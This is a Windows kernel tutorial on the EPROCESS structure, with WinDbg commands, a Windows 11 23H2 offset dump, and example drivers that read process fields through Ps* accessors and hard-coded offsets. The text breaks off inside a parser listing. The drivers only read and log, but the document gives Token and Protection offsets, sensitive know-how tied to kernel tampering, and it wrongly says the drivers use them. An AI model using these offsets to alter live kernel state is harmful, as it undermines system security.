# Viewing the EPROCESS structure

In Windows the EPROCESS (Executive Process) block is the kernel data structure the executive uses to represent a process. Its first member, Pcb, is the KPROCESS block used by the kernel's scheduling layer; the rest of the structure holds the executive's per-process state.

The structure is large and, among other things, records:

  • the process ID (PID)
  • the parent process ID
  • the creation time
  • the security context (the primary token)
  • address-space information (VAD tree, page directory)
  • the handle table of objects the process owns
  • the thread list
  • priority values
  • memory usage counters
  • assorted flags and state bits

EPROCESS is opaque to drivers: the public headers expose only the `PEPROCESS` pointer type, and member offsets are available only from symbols.

## 1. Viewing EPROCESS in WinDbg

In a WinDbg kernel-debugging session several commands display and navigate the EPROCESS structure. The commonly used ones:

1. Display the structure definition with the `dt` command:

   ```
   dt nt!_EPROCESS
   ```

   This prints the layout and every member of EPROCESS, with offsets taken from the symbols of the kernel being debugged, so they are correct for exactly that build.

2. Display a particular process:

   ```
   !process [EPROCESS address] 1
   ```

   or by PID:

   ```
   !process [PID] 1
   ```

   `!process` accepts either form; the flags value `1` prints the basic process fields without listing its threads.

3. Get the EPROCESS address of the current process and dump it:

   ```
   r $proc
   dt nt!_EPROCESS @$proc
   ```

   `$proc` is a pseudo-register that holds the EPROCESS address of the current process context.

4. Display specific members only:

   ```
   dt nt!_EPROCESS [EPROCESS address] [member name]
   ```

   for example:

   ```
   dt nt!_EPROCESS @$proc ImageFileName
   ```

5. Display the Process Environment Block with `!peb`. Its argument is the PEB address, not the EPROCESS address, and the PEB lives in user-mode memory, so switch into the process context first and the extension locates the PEB itself:

   ```
   .process /p /r [EPROCESS address]
   !peb
   ```

6. List all processes with their EPROCESS addresses:

   ```
   !process 0 0
   ```

7. `!dlls -p [PID]` lists the modules loaded in a process; its output uses DML (Debugger Markup Language) links that can be clicked to navigate further.

Combining these commands is enough to explore the whole structure. EPROCESS changes between Windows versions, and occasionally between builds of the same version, so member offsets must always be read from the symbols of the kernel in use rather than copied from another machine.

## 2. Output on Windows 11 23H2 (x64)

The `dt nt!_EPROCESS` output below is the source of every offset used in the driver listings on this page (UniqueProcessId at 0x440, Token at 0x4b8, InheritedFromUniqueProcessId at 0x540, ImageFileName at 0x5a8, Protection at 0x87a).

0: kd> dt nt!_EPROCESS
+0x000 Pcb : _KPROCESS
+0x438 ProcessLock : _EX_PUSH_LOCK
+0x440 UniqueProcessId : Ptr64 Void
+0x448 ActiveProcessLinks : _LIST_ENTRY
+0x458 RundownProtect : _EX_RUNDOWN_REF
+0x460 Flags2 : Uint4B
+0x460 JobNotReallyActive : Pos 0, 1 Bit
+0x460 AccountingFolded : Pos 1, 1 Bit
+0x460 NewProcessReported : Pos 2, 1 Bit
+0x460 ExitProcessReported : Pos 3, 1 Bit
+0x460 ReportCommitChanges : Pos 4, 1 Bit
+0x460 LastReportMemory : Pos 5, 1 Bit
+0x460 ForceWakeCharge : Pos 6, 1 Bit
+0x460 CrossSessionCreate : Pos 7, 1 Bit
+0x460 NeedsHandleRundown : Pos 8, 1 Bit
+0x460 RefTraceEnabled : Pos 9, 1 Bit
+0x460 PicoCreated : Pos 10, 1 Bit
+0x460 EmptyJobEvaluated : Pos 11, 1 Bit
+0x460 DefaultPagePriority : Pos 12, 3 Bits
+0x460 PrimaryTokenFrozen : Pos 15, 1 Bit
+0x460 ProcessVerifierTarget : Pos 16, 1 Bit
+0x460 RestrictSetThreadContext : Pos 17, 1 Bit
+0x460 AffinityPermanent : Pos 18, 1 Bit
+0x460 AffinityUpdateEnable : Pos 19, 1 Bit
+0x460 PropagateNode : Pos 20, 1 Bit
+0x460 ExplicitAffinity : Pos 21, 1 Bit
+0x460 ProcessExecutionState : Pos 22, 2 Bits
+0x460 EnableReadVmLogging : Pos 24, 1 Bit
+0x460 EnableWriteVmLogging : Pos 25, 1 Bit
+0x460 FatalAccessTerminationRequested : Pos 26, 1 Bit
+0x460 DisableSystemAllowedCpuSet : Pos 27, 1 Bit
+0x460 ProcessStateChangeRequest : Pos 28, 2 Bits
+0x460 ProcessStateChangeInProgress : Pos 30, 1 Bit
+0x460 InPrivate : Pos 31, 1 Bit
+0x464 Flags : Uint4B
+0x464 CreateReported : Pos 0, 1 Bit
+0x464 NoDebugInherit : Pos 1, 1 Bit
+0x464 ProcessExiting : Pos 2, 1 Bit
+0x464 ProcessDelete : Pos 3, 1 Bit
+0x464 ManageExecutableMemoryWrites : Pos 4, 1 Bit
+0x464 VmDeleted : Pos 5, 1 Bit
+0x464 OutswapEnabled : Pos 6, 1 Bit
+0x464 Outswapped : Pos 7, 1 Bit
+0x464 FailFastOnCommitFail : Pos 8, 1 Bit
+0x464 Wow64VaSpace4Gb : Pos 9, 1 Bit
+0x464 AddressSpaceInitialized : Pos 10, 2 Bits
+0x464 SetTimerResolution : Pos 12, 1 Bit
+0x464 BreakOnTermination : Pos 13, 1 Bit
+0x464 DeprioritizeViews : Pos 14, 1 Bit
+0x464 WriteWatch : Pos 15, 1 Bit
+0x464 ProcessInSession : Pos 16, 1 Bit
+0x464 OverrideAddressSpace : Pos 17, 1 Bit
+0x464 HasAddressSpace : Pos 18, 1 Bit
+0x464 LaunchPrefetched : Pos 19, 1 Bit
+0x464 Reserved : Pos 20, 1 Bit
+0x464 VmTopDown : Pos 21, 1 Bit
+0x464 ImageNotifyDone : Pos 22, 1 Bit
+0x464 PdeUpdateNeeded : Pos 23, 1 Bit
+0x464 VdmAllowed : Pos 24, 1 Bit
+0x464 ProcessRundown : Pos 25, 1 Bit
+0x464 ProcessInserted : Pos 26, 1 Bit
+0x464 DefaultIoPriority : Pos 27, 3 Bits
+0x464 ProcessSelfDelete : Pos 30, 1 Bit
+0x464 SetTimerResolutionLink : Pos 31, 1 Bit
+0x468 CreateTime : _LARGE_INTEGER
+0x470 ProcessQuotaUsage : [2] Uint8B
+0x480 ProcessQuotaPeak : [2] Uint8B
+0x490 PeakVirtualSize : Uint8B
+0x498 VirtualSize : Uint8B
+0x4a0 SessionProcessLinks : _LIST_ENTRY
+0x4b0 ExceptionPortData : Ptr64 Void
+0x4b0 ExceptionPortValue : Uint8B
+0x4b0 ExceptionPortState : Pos 0, 3 Bits
+0x4b8 Token : _EX_FAST_REF
+0x4c0 MmReserved : Uint8B
+0x4c8 AddressCreationLock : _EX_PUSH_LOCK
+0x4d0 PageTableCommitmentLock : _EX_PUSH_LOCK
+0x4d8 RotateInProgress : Ptr64 _ETHREAD
+0x4e0 ForkInProgress : Ptr64 _ETHREAD
+0x4e8 CommitChargeJob : Ptr64 _EJOB
+0x4f0 CloneRoot : _RTL_AVL_TREE
+0x4f8 NumberOfPrivatePages : Uint8B
+0x500 NumberOfLockedPages : Uint8B
+0x508 Win32Process : Ptr64 Void
+0x510 Job : Ptr64 _EJOB
+0x518 SectionObject : Ptr64 Void
+0x520 SectionBaseAddress : Ptr64 Void
+0x528 Cookie : Uint4B
+0x530 WorkingSetWatch : Ptr64 _PAGEFAULT_HISTORY
+0x538 Win32WindowStation : Ptr64 Void
+0x540 InheritedFromUniqueProcessId : Ptr64 Void
+0x548 OwnerProcessId : Uint8B
+0x550 Peb : Ptr64 _PEB
+0x558 Session : Ptr64 _MM_SESSION_SPACE
+0x560 Spare1 : Ptr64 Void
+0x568 QuotaBlock : Ptr64 _EPROCESS_QUOTA_BLOCK
+0x570 ObjectTable : Ptr64 _HANDLE_TABLE
+0x578 DebugPort : Ptr64 Void
+0x580 WoW64Process : Ptr64 _EWOW64PROCESS
+0x588 DeviceMap : _EX_FAST_REF
+0x590 EtwDataSource : Ptr64 Void
+0x598 PageDirectoryPte : Uint8B
+0x5a0 ImageFilePointer : Ptr64 _FILE_OBJECT
+0x5a8 ImageFileName : [15] UChar
+0x5b7 PriorityClass : UChar
+0x5b8 SecurityPort : Ptr64 Void
+0x5c0 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO
+0x5c8 JobLinks : _LIST_ENTRY
+0x5d8 HighestUserAddress : Ptr64 Void
+0x5e0 ThreadListHead : _LIST_ENTRY
+0x5f0 ActiveThreads : Uint4B
+0x5f4 ImagePathHash : Uint4B
+0x5f8 DefaultHardErrorProcessing : Uint4B
+0x5fc LastThreadExitStatus : Int4B
+0x600 PrefetchTrace : _EX_FAST_REF
+0x608 LockedPagesList : Ptr64 Void
+0x610 ReadOperationCount : _LARGE_INTEGER
+0x618 WriteOperationCount : _LARGE_INTEGER
+0x620 OtherOperationCount : _LARGE_INTEGER
+0x628 ReadTransferCount : _LARGE_INTEGER
+0x630 WriteTransferCount : _LARGE_INTEGER
+0x638 OtherTransferCount : _LARGE_INTEGER
+0x640 CommitChargeLimit : Uint8B
+0x648 CommitCharge : Uint8B
+0x650 CommitChargePeak : Uint8B
+0x680 Vm : _MMSUPPORT_FULL
+0x7c0 MmProcessLinks : _LIST_ENTRY
+0x7d0 ModifiedPageCount : Uint4B
+0x7d4 ExitStatus : Int4B
+0x7d8 VadRoot : _RTL_AVL_TREE
+0x7e0 VadHint : Ptr64 Void
+0x7e8 VadCount : Uint8B
+0x7f0 VadPhysicalPages : Uint8B
+0x7f8 VadPhysicalPagesLimit : Uint8B
+0x800 AlpcContext : _ALPC_PROCESS_CONTEXT
+0x820 TimerResolutionLink : _LIST_ENTRY
+0x830 TimerResolutionStackRecord : Ptr64 _PO_DIAG_STACK_RECORD
+0x838 RequestedTimerResolution : Uint4B
+0x83c SmallestTimerResolution : Uint4B
+0x840 ExitTime : _LARGE_INTEGER
+0x848 InvertedFunctionTable : Ptr64 _INVERTED_FUNCTION_TABLE_KERNEL_MODE
+0x850 InvertedFunctionTableLock : _EX_PUSH_LOCK
+0x858 ActiveThreadsHighWatermark : Uint4B
+0x85c LargePrivateVadCount : Uint4B
+0x860 ThreadListLock : _EX_PUSH_LOCK
+0x868 WnfContext : Ptr64 Void
+0x870 ServerSilo : Ptr64 _EJOB
+0x878 SignatureLevel : UChar
+0x879 SectionSignatureLevel : UChar
+0x87a Protection : _PS_PROTECTION
+0x87b HangCount : Pos 0, 3 Bits
+0x87b GhostCount : Pos 3, 3 Bits
+0x87b PrefilterException : Pos 6, 1 Bit
+0x87c Flags3 : Uint4B
+0x87c Minimal : Pos 0, 1 Bit
+0x87c ReplacingPageRoot : Pos 1, 1 Bit
+0x87c Crashed : Pos 2, 1 Bit
+0x87c JobVadsAreTracked : Pos 3, 1 Bit
+0x87c VadTrackingDisabled : Pos 4, 1 Bit
+0x87c AuxiliaryProcess : Pos 5, 1 Bit
+0x87c SubsystemProcess : Pos 6, 1 Bit
+0x87c IndirectCpuSets : Pos 7, 1 Bit
+0x87c RelinquishedCommit : Pos 8, 1 Bit
+0x87c HighGraphicsPriority : Pos 9, 1 Bit
+0x87c CommitFailLogged : Pos 10, 1 Bit
+0x87c ReserveFailLogged : Pos 11, 1 Bit
+0x87c SystemProcess : Pos 12, 1 Bit
+0x87c HideImageBaseAddresses : Pos 13, 1 Bit
+0x87c AddressPolicyFrozen : Pos 14, 1 Bit
+0x87c ProcessFirstResume : Pos 15, 1 Bit
+0x87c ForegroundExternal : Pos 16, 1 Bit
+0x87c ForegroundSystem : Pos 17, 1 Bit
+0x87c HighMemoryPriority : Pos 18, 1 Bit
+0x87c EnableProcessSuspendResumeLogging : Pos 19, 1 Bit
+0x87c EnableThreadSuspendResumeLogging : Pos 20, 1 Bit
+0x87c SecurityDomainChanged : Pos 21, 1 Bit
+0x87c SecurityFreezeComplete : Pos 22, 1 Bit
+0x87c VmProcessorHost : Pos 23, 1 Bit
+0x87c VmProcessorHostTransition : Pos 24, 1 Bit
+0x87c AltSyscall : Pos 25, 1 Bit
+0x87c TimerResolutionIgnore : Pos 26, 1 Bit
+0x87c DisallowUserTerminate : Pos 27, 1 Bit
+0x87c EnableProcessRemoteExecProtectVmLogging : Pos 28, 1 Bit
+0x87c EnableProcessLocalExecProtectVmLogging : Pos 29, 1 Bit
+0x87c MemoryCompressionProcess : Pos 30, 1 Bit
+0x880 DeviceAsid : Int4B
+0x888 SvmData : Ptr64 Void
+0x890 SvmProcessLock : _EX_PUSH_LOCK
+0x898 SvmLock : Uint8B
+0x8a0 SvmProcessDeviceListHead : _LIST_ENTRY
+0x8b0 LastFreezeInterruptTime : Uint8B
+0x8b8 DiskCounters : Ptr64 _PROCESS_DISK_COUNTERS
+0x8c0 PicoContext : Ptr64 Void
+0x8c8 EnclaveTable : Ptr64 Void
+0x8d0 EnclaveNumber : Uint8B
+0x8d8 EnclaveLock : _EX_PUSH_LOCK
+0x8e0 HighPriorityFaultsAllowed : Uint4B
+0x8e8 EnergyContext : Ptr64 _PO_PROCESS_ENERGY_CONTEXT
+0x8f0 VmContext : Ptr64 Void
+0x8f8 SequenceNumber : Uint8B
+0x900 CreateInterruptTime : Uint8B
+0x908 CreateUnbiasedInterruptTime : Uint8B
+0x910 TotalUnbiasedFrozenTime : Uint8B
+0x918 LastAppStateUpdateTime : Uint8B
+0x920 LastAppStateUptime : Pos 0, 61 Bits
+0x920 LastAppState : Pos 61, 3 Bits
+0x928 SharedCommitCharge : Uint8B
+0x930 SharedCommitLock : _EX_PUSH_LOCK
+0x938 SharedCommitLinks : _LIST_ENTRY
+0x948 AllowedCpuSets : Uint8B
+0x950 DefaultCpuSets : Uint8B
+0x948 AllowedCpuSetsIndirect : Ptr64 Uint8B
+0x950 DefaultCpuSetsIndirect : Ptr64 Uint8B
+0x958 DiskIoAttribution : Ptr64 Void
+0x960 DxgProcess : Ptr64 Void
+0x968 Win32KFilterSet : Uint4B
+0x96c Machine : Uint2B
+0x96e Spare0 : Uint2B
+0x970 ProcessTimerDelay : _PS_INTERLOCKED_TIMER_DELAY_VALUES
+0x978 KTimerSets : Uint4B
+0x97c KTimer2Sets : Uint4B
+0x980 ThreadTimerSets : Uint4B
+0x988 VirtualTimerListLock : Uint8B
+0x990 VirtualTimerListHead : _LIST_ENTRY
+0x9a0 WakeChannel : _WNF_STATE_NAME
+0x9a0 WakeInfo : _PS_PROCESS_WAKE_INFORMATION
+0x9d0 MitigationFlags : Uint4B
+0x9d0 MitigationFlagsValues : <unnamed-tag>
+0x9d4 MitigationFlags2 : Uint4B
+0x9d4 MitigationFlags2Values : <unnamed-tag>
+0x9d8 PartitionObject : Ptr64 Void
+0x9e0 SecurityDomain : Uint8B
+0x9e8 ParentSecurityDomain : Uint8B
+0x9f0 CoverageSamplerContext : Ptr64 Void
+0x9f8 MmHotPatchContext : Ptr64 Void
+0xa00 IdealProcessorAssignmentBlock : _KE_IDEAL_PROCESSOR_ASSIGNMENT_BLOCK
+0xb18 DynamicEHContinuationTargetsTree : _RTL_AVL_TREE
+0xb20 DynamicEHContinuationTargetsLock : _EX_PUSH_LOCK
+0xb28 DynamicEnforcedCetCompatibleRanges : _PS_DYNAMIC_ENFORCED_ADDRESS_RANGES
+0xb38 DisabledComponentFlags : Uint4B
+0xb3c PageCombineSequence : Int4B
+0xb40 EnableOptionalXStateFeaturesLock : _EX_PUSH_LOCK
+0xb48 PathRedirectionHashes : Ptr64 Uint4B
+0xb50 SyscallProvider : Ptr64 _PS_SYSCALL_PROVIDER
+0xb58 SyscallProviderProcessLinks : _LIST_ENTRY
+0xb68 SyscallProviderDispatchContext : _PSP_SYSCALL_PROVIDER_DISPATCH_CONTEXT
+0xb70 MitigationFlags3 : Uint4B
+0xb70 MitigationFlags3Values : <unnamed-tag>

## 3. Accessing EPROCESS information from a driver through exported Ps* functions

The Ps* accessor functions exported by ntoskrnl read EPROCESS members on the driver's behalf, so a driver built this way does not depend on the structure layout and works unchanged across kernel builds. Some of them (PsGetProcessInheritedFromUniqueProcessId, PsGetProcessPeb, PsGetProcessImageFileName) are exported but not declared in the WDK headers and must be declared by hand.

```c
#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning(disable : 4100)

// DbgPrintEx with a fixed prefix; "\n" is appended so every message ends a line.
#define DebugMessage(x, ...) DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, x "\n", __VA_ARGS__)

// Declarations the WDK headers do not provide.
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemProcessInformation = 5
    // other values omitted
} SYSTEM_INFORMATION_CLASS;

// Leading fields of the SystemProcessInformation record. Only the fields used
// here are named; the full record is longer and is walked via NextEntryOffset.
typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    LARGE_INTEGER Reserved[3];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    KPRIORITY BasePriority;
    HANDLE UniqueProcessId;
    HANDLE InheritedFromUniqueProcessId;
    ULONG HandleCount;
    ULONG SessionId;
    ULONG_PTR PageDirectoryBase;
    // remaining fields omitted
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

// Exported by ntoskrnl but not declared in ntifs.h.
NTSTATUS NTAPI ZwQuerySystemInformation(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
);

// Ps* accessors exported by ntoskrnl. They read the EPROCESS members for us,
// so the driver never needs to know the structure offsets.
HANDLE PsGetProcessInheritedFromUniqueProcessId(PEPROCESS Process);
ULONG PsGetProcessSessionId(PEPROCESS Process);
PPEB PsGetProcessPeb(PEPROCESS Process);
PUCHAR PsGetProcessImageFileName(PEPROCESS Process);

VOID GetProcessInfo(HANDLE ProcessId);
VOID EnumerateProcesses(VOID);
NTSTATUS GetProcessNameByPid(HANDLE ProcessId, PUCHAR ProcessName, SIZE_T ProcessNameSize);

// Driver unload routine (DriverUnload has a VOID signature).
VOID UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // DriverEntry runs in the System process context, so the "current process"
    // here is System (PID 4).
    DebugMessage("qi:Getting current process info...");
    PEPROCESS CurrentProcess = PsGetCurrentProcess();
    HANDLE CurrentPid = PsGetProcessId(CurrentProcess);
    GetProcessInfo(CurrentPid);

    DebugMessage("qi:Enumerating all processes...");
    EnumerateProcesses();

    // Look up one specific process (System, PID 4).
    DebugMessage("qi:Looking up System process...");
    GetProcessInfo((HANDLE)4);

    return STATUS_SUCCESS;
}

// Prints the information reachable through the Ps* accessors for one PID.
VOID GetProcessInfo(HANDLE ProcessId)
{
    PEPROCESS ProcessObj;
    NTSTATUS status;
    UCHAR ProcessName[16] = { 0 }; // ImageFileName holds at most 15 characters, plus NUL

    // PsLookupProcessByProcessId takes a reference on the object; it must be
    // released with ObDereferenceObject when we are done with it.
    status = PsLookupProcessByProcessId(ProcessId, &ProcessObj);
    if (!NT_SUCCESS(status)) {
        DebugMessage("qi:Failed to find process with PID %u, status: 0x%X", HandleToULong(ProcessId), status);
        return;
    }

    status = GetProcessNameByPid(ProcessId, ProcessName, sizeof(ProcessName));
    if (NT_SUCCESS(status)) {
        DebugMessage("qi:Process Name: %s", ProcessName);
    }

    DebugMessage("qi:Process ID: %u", HandleToULong(PsGetProcessId(ProcessObj)));

    // Parent PID as recorded at creation time (the parent may have exited since).
    HANDLE ParentPid = PsGetProcessInheritedFromUniqueProcessId(ProcessObj);
    if (ParentPid) {
        DebugMessage("qi:Parent Process ID: %u", HandleToULong(ParentPid));
    }

    DebugMessage("qi:Process Session ID: %u", PsGetProcessSessionId(ProcessObj));

    // The PEB lives in the user-mode address space; System has none.
    PPEB Peb = PsGetProcessPeb(ProcessObj);
    if (Peb) {
        DebugMessage("qi:Process PEB Address: 0x%p", Peb);
    }
    else {
        DebugMessage("qi:Process has no PEB (kernel-only process)");
    }

    ObDereferenceObject(ProcessObj);
}

// Copies the process image name (first 15 bytes of the image file name, not
// the full path) into the caller's buffer.
NTSTATUS GetProcessNameByPid(HANDLE ProcessId, PUCHAR ProcessName, SIZE_T ProcessNameSize)
{
    PEPROCESS ProcessObj;
    NTSTATUS status;

    status = PsLookupProcessByProcessId(ProcessId, &ProcessObj);
    if (!NT_SUCCESS(status)) {
        return status;
    }

    // Returns a pointer directly into EPROCESS.ImageFileName.
    PUCHAR ImageFileName = PsGetProcessImageFileName(ProcessObj);
    if (ImageFileName) {
        RtlStringCbCopyA((PCHAR)ProcessName, ProcessNameSize, (PCHAR)ImageFileName);
    }
    else {
        RtlStringCbCopyA((PCHAR)ProcessName, ProcessNameSize, "Unknown");
    }

    ObDereferenceObject(ProcessObj);
    return STATUS_SUCCESS;
}

// Enumerates all processes through SystemProcessInformation and prints each one.
VOID EnumerateProcesses(VOID)
{
    ULONG BufferSize = 0;
    ULONG ReturnLength = 0;
    ULONG Remaining;
    PVOID Buffer = NULL;
    NTSTATUS status;
    PSYSTEM_PROCESS_INFORMATION Current;

    // The first call (NULL, 0) only reports the required size. Processes can be
    // created between that call and the real query, in which case the second
    // call also fails with STATUS_INFO_LENGTH_MISMATCH, so allocate with some
    // headroom and retry instead of giving up.
    for (;;) {
        status = ZwQuerySystemInformation(SystemProcessInformation, Buffer, BufferSize, &ReturnLength);
        if (status != STATUS_INFO_LENGTH_MISMATCH) {
            break;
        }
        if (Buffer) {
            ExFreePoolWithTag(Buffer, 'CORP');
        }
        BufferSize = ReturnLength + 0x10000;
        Buffer = ExAllocatePoolWithTag(NonPagedPool, BufferSize, 'CORP');
        if (!Buffer) {
            DebugMessage("qi:Failed to allocate memory for process information");
            return;
        }
    }

    if (!NT_SUCCESS(status) || Buffer == NULL) {
        DebugMessage("qi:Failed to query process information: 0x%X", status);
        if (Buffer) {
            ExFreePoolWithTag(Buffer, 'CORP');
        }
        return;
    }

    // Walk the records. Every step is bounded by the number of bytes actually
    // returned, so a bad NextEntryOffset cannot carry the walk out of the buffer.
    Remaining = ReturnLength ? ReturnLength : BufferSize;
    Current = (PSYSTEM_PROCESS_INFORMATION)Buffer;
    while (Remaining >= sizeof(SYSTEM_PROCESS_INFORMATION)) {
        // PID 0 (Idle) has no CID table entry and cannot be looked up.
        if (Current->UniqueProcessId != NULL) {
            GetProcessInfo(Current->UniqueProcessId);
        }

        if (Current->NextEntryOffset == 0 || Current->NextEntryOffset > Remaining) {
            break;
        }
        Remaining -= Current->NextEntryOffset;
        Current = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)Current + Current->NextEntryOffset);
    }

    ExFreePoolWithTag(Buffer, 'CORP');
}
```

## 4. Accessing EPROCESS information from a driver through hard-coded offsets

Reading members by offset ties the driver to one kernel build: the values below are the Windows 11 23H2 x64 offsets from the dump in section 2 and land in unrelated members on any other build.

```c
#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning(disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, x "\n", __VA_ARGS__)

// EPROCESS member offsets. These are build-specific: the values below are taken
// from the Windows 11 23H2 x64 `dt nt!_EPROCESS` output in section 2 and must
// be re-read from symbols for any other kernel build.
#define EPROCESS_PID_OFFSET         0x440 // UniqueProcessId              : Ptr64 Void
#define EPROCESS_PPID_OFFSET        0x540 // InheritedFromUniqueProcessId : Ptr64 Void
#define EPROCESS_IMAGE_NAME_OFFSET  0x5a8 // ImageFileName                : [15] UChar
#define EPROCESS_CREATE_TIME_OFFSET 0x468 // CreateTime                   : _LARGE_INTEGER
#define EPROCESS_EXIT_STATUS_OFFSET 0x7d4 // ExitStatus                   : Int4B
#define EPROCESS_SESSION_OFFSET     0x558 // Session                      : Ptr64 _MM_SESSION_SPACE

// Exported by ntoskrnl; used because EPROCESS has no SessionId member of its own.
ULONG PsGetProcessSessionId(PEPROCESS Process);

VOID UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
}

// Reads EPROCESS members by raw offset instead of through the Ps* accessors.
VOID DumpEprocessByOffset(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID (Offset: 0x%X): %u (0x%X)",
        EPROCESS_PID_OFFSET, HandleToULong(processId), HandleToULong(processId));

    HANDLE parentProcessId = *(PHANDLE)(processBase + EPROCESS_PPID_OFFSET);
    DebugMessage("qi:Parent Process ID (Offset: 0x%X): %u (0x%X)",
        EPROCESS_PPID_OFFSET, HandleToULong(parentProcessId), HandleToULong(parentProcessId));

    // ImageFileName is a fixed 15-byte array that is not guaranteed to be
    // NUL-terminated, so copy it into a 16-byte buffer before printing.
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name (Offset: 0x%X): %s", EPROCESS_IMAGE_NAME_OFFSET, imageName);

    // 100 ns units since 1601 (FILETIME format).
    LARGE_INTEGER createTime = *(PLARGE_INTEGER)(processBase + EPROCESS_CREATE_TIME_OFFSET);
    DebugMessage("qi:Process Create Time (Offset: 0x%X): 0x%llX", EPROCESS_CREATE_TIME_OFFSET, createTime.QuadPart);

    // Session is a pointer to the _MM_SESSION_SPACE; the numeric session ID is
    // read through the exported accessor.
    PVOID session = *(PVOID *)(processBase + EPROCESS_SESSION_OFFSET);
    DebugMessage("qi:Session (Offset: 0x%X): 0x%p, Session ID: %u",
        EPROCESS_SESSION_OFFSET, session, PsGetProcessSessionId(Process));

    // Holds STATUS_PENDING (0x103) while the process is still running.
    NTSTATUS exitStatus = *(PNTSTATUS)(processBase + EPROCESS_EXIT_STATUS_OFFSET);
    DebugMessage("qi:Exit Status (Offset: 0x%X): 0x%X", EPROCESS_EXIT_STATUS_OFFSET, exitStatus);

    DebugMessage("qi:EPROCESS Address: 0x%p", Process);

    // Raw bytes at the parent-PID offset, for checking the offset against the
    // `dt` output in WinDbg.
    DebugMessage("qi:Memory dump at Parent PID offset (0x%X):", EPROCESS_PPID_OFFSET);
    for (int i = 0; i < 8; i++) {
        DebugMessage("qi: Byte %d: 0x%02X", i, processBase[EPROCESS_PPID_OFFSET + i]);
    }
}

// Looks up the process with the given PID and dumps it by offset.
VOID AccessProcessByPid(HANDLE ProcessId)
{
    PEPROCESS processObject;
    NTSTATUS status;

    status = PsLookupProcessByProcessId(ProcessId, &processObject);
    if (NT_SUCCESS(status))
    {
        DebugMessage("qi:Found process with PID %u (0x%X)", HandleToULong(ProcessId), HandleToULong(ProcessId));
        DumpEprocessByOffset(processObject);
        ObDereferenceObject(processObject);
    }
    else
    {
        DebugMessage("qi:Failed to find process with PID %u (0x%X), status: 0x%X",
            HandleToULong(ProcessId), HandleToULong(ProcessId), status);
    }
}

// Dumps the current process (System, when called from DriverEntry).
VOID AccessCurrentProcess(VOID)
{
    PEPROCESS currentProcess = PsGetCurrentProcess();
    DebugMessage("qi:Current Process EPROCESS Information:");
    DumpEprocessByOffset(currentProcess);
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    DebugMessage("qi:WARNING: This driver uses hard-coded EPROCESS offsets that are specific to one Windows build");
    DebugMessage("qi:Current offsets are for Windows 11 23H2 x64. Re-read them from symbols for any other build");

    AccessCurrentProcess();

    // System process (PID 4).
    AccessProcessByPid((HANDLE)4);

    // Idle (PID 0) has no CID table entry, so this lookup is expected to fail.
    AccessProcessByPid((HANDLE)0);

    // A few arbitrary PIDs that may or may not exist on the test machine.
    ULONG testPids[] = { 100, 1500, 2000, 2500, 5000 };
    for (int i = 0; i < sizeof(testPids) / sizeof(ULONG); i++)
    {
        AccessProcessByPid((HANDLE)(ULONG_PTR)testPids[i]);
    }

    return STATUS_SUCCESS;
}
```
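Hand-copying offsets from a debugger session into `#define` lines is where the mismatches in listings like the one above come from. The parser below is an added example written for this page, not code from the original driver: it reads `dt nt!_EPROCESS` output (a subset of the 23H2 dump from section 2, embedded here as constructed input), builds an offset table, derives each member's size from the distance to the next member (the one thing `dt` does not print, and the reason a one-byte `Protection` must not be written as a DWORD), and emits the defines the drivers on this page use. The function names and the embedded text are this example's own.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Subset of the Windows 11 23H2 x64 `dt nt!_EPROCESS` output shown in section 2,
   embedded so the parser runs offline. */
static const char *kDtOutput =
    "0: kd> dt nt!_EPROCESS\n"
    "   +0x000 Pcb : _KPROCESS\n"
    "   +0x440 UniqueProcessId : Ptr64 Void\n"
    "   +0x448 ActiveProcessLinks : _LIST_ENTRY\n"
    "   +0x460 Flags2 : Uint4B\n"
    "   +0x460 JobNotReallyActive : Pos 0, 1 Bit\n"
    "   +0x464 Flags : Uint4B\n"
    "   +0x468 CreateTime : _LARGE_INTEGER\n"
    "   +0x4b8 Token : _EX_FAST_REF\n"
    "   +0x4c0 MmReserved : Uint8B\n"
    "   +0x540 InheritedFromUniqueProcessId : Ptr64 Void\n"
    "   +0x548 OwnerProcessId : Uint8B\n"
    "   +0x5a8 ImageFileName : [15] UChar\n"
    "   +0x5b7 PriorityClass : UChar\n"
    "   +0x7d4 ExitStatus : Int4B\n"
    "   +0x87a Protection : _PS_PROTECTION\n"
    "   +0x87b HangCount : Pos 0, 3 Bits\n"
    "   +0x87c Flags3 : Uint4B\n";

#define MAX_FIELDS 512

typedef struct {
    unsigned offset;
    char name[64];
    char type[64];
    int is_bitfield;   /* "Pos N, M Bits" entries share the offset of their container */
} dt_field;

static dt_field g_fields[MAX_FIELDS];
static int g_nfields = -1;

/* Parses "+0xNNN Name : Type" lines; anything else (the prompt line) is skipped. */
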